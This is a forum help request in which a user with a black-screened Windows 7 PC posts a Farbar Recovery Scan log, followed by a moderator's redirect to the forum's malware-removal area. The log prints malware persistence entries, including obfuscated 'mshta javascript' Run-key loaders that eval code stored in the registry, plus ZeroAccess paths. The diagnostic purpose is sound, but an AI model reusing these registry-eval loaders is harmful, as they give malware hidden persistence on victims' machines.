My Windows 7 OS has just a black screen with the cursor in the middle.  I have tried to launch it in safe mode and everything else that all the other forums suggested but nothing is working.  I found another topic on this site that had information that was for that specific computer so now that I have downloaded the Farbar tool and scanned the infected computer I don't know what the next step is... If anyone could offer some help it would be greatly appreciated.  If I am not going about this the right way then I apologize, but I really don't know what else to do.

 

Here are the results of the Farbar scan:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-09-2015 01
Ran by SYSTEM on MININT-ITIPCP2 (11-09-2015 13:56:44)
Running from F:\
Platform: Windows 7 Home Premium (X64) Language: English (United States)
Internet Explorer Version 9
Boot Mode: Recovery
Default: ControlSet003
ATTENTION!:=====> If the system is bootable FRST must be run from normal or Safe mode to create a complete log.
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\...\Run: [**246c6654<*>] => mshta javascript:cVyqLD8C="jHu";m1w=new%20ActiveXObject("WScript.Shell");Fko57OhUa="6HIAubL9";GvG7H0=m1w.RegRead("HKLM\\software\\Wow6432Node\\24f0a094b5\\5abff29d");gWw3DEE6A="8P";eval(GvG7H0);dqi3qj (the data entry has 14 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\runonceex: [] => [X]
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist\514\G2AWinLogon_x64.dll [X]
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [**54c488f2<*>] => mshta javascript:Cmg9jOg1L="aRy";Jv59=new%20ActiveXObject("WScript.Shell");VXHzZ7iNp="70";Y5FOj6=Jv59.RegRead("HKLM\\software\\Wow6432Node\\24f0a094b5\\5abff29d");U7GKiyKah="tTM";eval(Y5FOj6);TMpv1GcW (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\WTs Guns\...\Run: [**246c6654<*>] => mshta javascript:S94NqkIF="XzZ";NS30=new%20ActiveXObject("WScript.Shell");us6ac2cD="qu8dA";inUD1=NS30.RegRead("HKCU\\software\\24f0a094b5\\5abff29d");RxBDrj63b="FnsGPu2";eval(inUD1);vmqshgn8k8="wv6dzj (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\WTs Guns\...\RunOnce: [*0d4fdb] => C:\b0d4fdb4\b0d4fdb4.exe [355840 2015-08-31] (MUKPOCOT)
HKU\WTs Guns\...\RunOnce: [*0d4fdb4] => C:\Users\WTs Guns\AppData\Roaming\b0d4fdb4.exe
HKU\WTs Guns\...\RunOnce: [CryptoUpdate] => C:\Windows\system32\regsvr32.exe /s "C:\Users\WTs Guns\AppData\Roaming\Microsoft\Crypto\RSA\cert_v65552_0.tpl"
AppInit_DLLs: C:\PROGRA~2\WI3C8A~1\Datamngr\x64\datamngr.dll => No File
AppInit_DLLs:  C:\PROGRA~2\WI3C8A~1\Datamngr\x64\IEBHO.dll => No File
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-03-06]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-03-06]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\QBDataServiceUser18\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-04-30]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\QBDataServiceUser20\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-05-27]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\QBDataServiceUser24\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2014-03-07]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
BootExecute: autocheck autochk * C:\PROGRA~2\AVG\AVG2012\avgrsa.exe /sync /restart
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 AdobeActiveFileMonitor11.0; C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated)
S4 avgwd; C:\Program Files (x86)\AVG\AVG2012\avgwdsvc.exe [193288 2012-02-14] (AVG Technologies CZ, s.r.o.)
S2 googleupdate; C:\Windows\bswiWxhdyvnHhyL.exe [512000 2015-05-20] ()
S4 QuickBooksDB18; C:\Program Files (x86)\Intuit\QuickBooks 2008\QBDBMgrN.exe [128536 2006-09-13] (iAnywhere Solutions, Inc.)
S3 QuickBooksDB20; C:\Program Files (x86)\Intuit\QuickBooks 2010\QBDBMgrN.exe [678912 2009-08-17] (Intuit, Inc.)
S3 QuickBooksDB24; C:\Program Files (x86)\Intuit\QuickBooks 2014\QBDBMgrN.exe [679936 2013-12-02] (Intuit, Inc.)
S4 vToolbarUpdater18.0.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.0.0\ToolbarUpdater.exe [1759768 2014-03-02] (AVG Secure Search)
S2 PccNTUpd; "C:\Program Files (x86)\Trend Micro\OfficeScan Client\PccNTUpd.exe" -service [X]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [28480 2012-04-19] (AVG Technologies CZ, s.r.o. )
S1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [307040 2012-11-08] (AVG Technologies CZ, s.r.o.)
S1 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [47696 2011-12-23] (AVG Technologies CZ, s.r.o.)
S0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [36944 2012-01-31] (AVG Technologies CZ, s.r.o.)
S1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-03-02] (AVG Technologies)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S0 Lbd; C:\Windows\System32\DRIVERS\Lbd.sys [69376 2012-07-24] (Lavasoft AB)
S0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-09] (Corel Corporation)
S3 Lavasoft Kernexplorer; \??\C:\Program Files (x86)\Lavasoft\Ad-Aware\KernExplorer64.sys [X]
S1 SBRE; \??\C:\Windows\system32\drivers\SBREdrv.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-09-11 13:56 - 2015-09-11 13:56 - 00000000 ____D C:\FRST
2015-09-06 06:33 - 2015-09-06 06:33 - 00000000 ____D C:\ProgramData\YojaWifo
2015-09-06 06:32 - 2015-09-06 06:34 - 00000157 _____ C:\Users\WTs Guns\AppData\Local\svcxdcl32.dat
2015-09-06 06:32 - 2015-09-06 06:32 - 00358400 _____ C:\Users\WTs Guns\AppData\Local\svcxdcl32.exe
2015-09-01 12:59 - 2015-09-07 13:29 - 00000504 ____H C:\Windows\Tasks\35eff4f8f3fd23f10907f307.job
2015-09-01 12:59 - 2015-09-07 11:14 - 00000382 ____H C:\Windows\Tasks\CryptoUpdate.job
2015-09-01 12:59 - 2015-09-07 10:44 - 00002962 _____ C:\Windows\System32\Tasks\CryptoUpdate
2015-09-01 12:59 - 2015-09-01 12:59 - 00003084 _____ C:\Windows\System32\Tasks\35eff4f8f3fd23f10907f307
2015-08-31 11:49 - 2015-08-31 11:49 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Google
2015-08-31 05:23 - 2015-08-31 05:23 - 00000000 ___HD C:\b0d4fdb4
2015-08-31 04:26 - 2015-08-31 04:26 - 00004096 _____ C:\ProgramData\hTew6txG06C4.dll
2015-08-31 04:24 - 2015-08-31 04:24 - 00004096 _____ C:\ProgramData\p2hbAwRM06C4.dll
2015-08-29 06:23 - 2015-08-29 06:24 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2015-08-28 04:07 - 2015-08-28 04:07 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Upvhmedia
2015-08-28 04:07 - 2015-08-28 04:07 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Okrics
2015-08-18 05:14 - 2015-08-28 04:47 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-09-11 09:23 - 2012-07-24 08:48 - 00026142 _____ C:\Windows\setupact.log
2015-09-11 09:23 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-09-11 08:50 - 2009-07-13 21:13 - 00797996 _____ C:\Windows\System32\PerfStringBackup.INI
2015-09-11 08:19 - 2012-07-24 07:45 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-09-11 08:15 - 2009-07-13 20:45 - 00022464 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-09-11 08:15 - 2009-07-13 20:45 - 00022464 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-09-09 09:57 - 2012-07-24 08:49 - 00089564 _____ C:\Windows\WindowsUpdate.log
2015-09-09 09:43 - 2010-10-05 07:08 - 00000000 ____D C:\Windows\pss
2015-09-02 09:30 - 2013-06-25 10:30 - 00079360 ___SH C:\Users\WTs Guns\Downloads\Thumbs.db
2015-09-02 09:30 - 2012-10-03 08:53 - 00000000 ____D C:\Users\WTs Guns\Desktop\shop Pics
2015-08-28 04:47 - 2012-07-24 08:48 - 00279972 _____ C:\Windows\PFRO.log
2015-08-28 04:47 - 2012-05-03 04:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-08-28 04:34 - 2012-07-24 07:45 - 00778440 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-08-28 04:34 - 2012-07-24 07:45 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-08-28 04:34 - 2011-05-24 12:43 - 00142536 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-08-19 12:48 - 2013-11-01 07:28 - 00002426 _____ C:\Users\WTs Guns\Desktop\IMS V6.lnk
2015-08-12 10:10 - 2013-04-09 10:33 - 00122368 ___SH C:\Users\WTs Guns\Desktop\Thumbs.db
 
ZeroAccess:
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000000.@
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000032.@
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000064.@
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\00000004.@
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\1afb2d56
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\201d3dde
 
ZeroAccess:
C:\Users\WTs Guns\AppData\Local\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}
 
Files to move or delete:
====================
C:\ProgramData\hTew6txG06C4.dll
C:\ProgramData\p2hbAwRM06C4.dll
C:\Users\WTs Guns\aaaaaaaa.exe
 
 
Some files in TEMP:
====================
C:\Users\WTs Guns\AppData\Local\Temp\3fffb56d-6b40-4cd3-b5fb-0ac36bf72961.exe
C:\Users\WTs Guns\AppData\Local\Temp\6013073.exe
C:\Users\WTs Guns\AppData\Local\Temp\76FA.tmp.exe
C:\Users\WTs Guns\AppData\Local\Temp\Abspdf.exe
C:\Users\WTs Guns\AppData\Local\Temp\acfpdfu.dll
C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuamd64.dll
C:\Users\WTs Guns\AppData\Local\Temp\acfpdfui.dll
C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuia64.dll
C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuiamd64.dll
C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuiia64.dll
C:\Users\WTs Guns\AppData\Local\Temp\ApnStub.exe
C:\Users\WTs Guns\AppData\Local\Temp\avguidx.dll
C:\Users\WTs Guns\AppData\Local\Temp\C07A.tmp.exe
C:\Users\WTs Guns\AppData\Local\Temp\cdintf.dll
C:\Users\WTs Guns\AppData\Local\Temp\CommonInstaller.exe
C:\Users\WTs Guns\AppData\Local\Temp\csrsss.exe
C:\Users\WTs Guns\AppData\Local\Temp\docviewe.exe
C:\Users\WTs Guns\AppData\Local\Temp\install_flash_player_18_active_x.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-6u39-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-7u40-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\MachineIdCreator.exe
C:\Users\WTs Guns\AppData\Local\Temp\oi_{2D24F029-B2B5-4807-A2F5-C3CDF78AE31D}.exe
C:\Users\WTs Guns\AppData\Local\Temp\PDFPRT400.exe
C:\Users\WTs Guns\AppData\Local\Temp\readSTILog.dll
C:\Users\WTs Guns\AppData\Local\Temp\ToolbarInstaller.exe
C:\Users\WTs Guns\AppData\Local\Temp\UNINSTALL.EXE
C:\Users\WTs Guns\AppData\Local\Temp\xmllite.dll
 
 
==================== Known DLLs (Whitelisted) =========================
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\dnsapi.dll => MD5 is legit
C:\Windows\SysWOW64\dnsapi.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
 
==================== Restore Points =========================
 
 
==================== Memory info =========================== 
 
Percentage of memory in use: 11%
Total physical RAM: 6108.98 MB
Available physical RAM: 5384.06 MB
Total Virtual: 6107.13 MB
Available Virtual: 5387.99 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:683.95 GB) (Free:469.29 GB) NTFS
Drive f: (USB20FD) (Removable) (Total:7.51 GB) (Free:7.5 GB) FAT32
Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
Drive y: (RECOVERY) (Fixed) (Total:14.65 GB) (Free:9.24 GB) NTFS ==>[system with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 78033E78)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=14.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=683.9 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (Size: 7.5 GB) (Disk ID: 04DD5721)
Partition 1: (Active) - (Size=7.5 GB) - (Type=0C)
 
 
LastRegBack: 2015-09-11 08:32
 
==================== End of FRST.txt ============================
Hello and Welcome to Malwarebytes

We are not permitted to work on possible malware-related issues here in this section of the forum.

Such work is conducted in a special forum area reserved for that purpose, or at the help desk.

Being that you are probably infected, feel free to follow the instructions below to receive free, one-on-one expert assistance in checking your system and clearing out any infections and correcting any damage done by the malware.

Please see the following pinned topic which has information on how to get help with this: Available Assistance for Possibly Infected Computers

Thank you
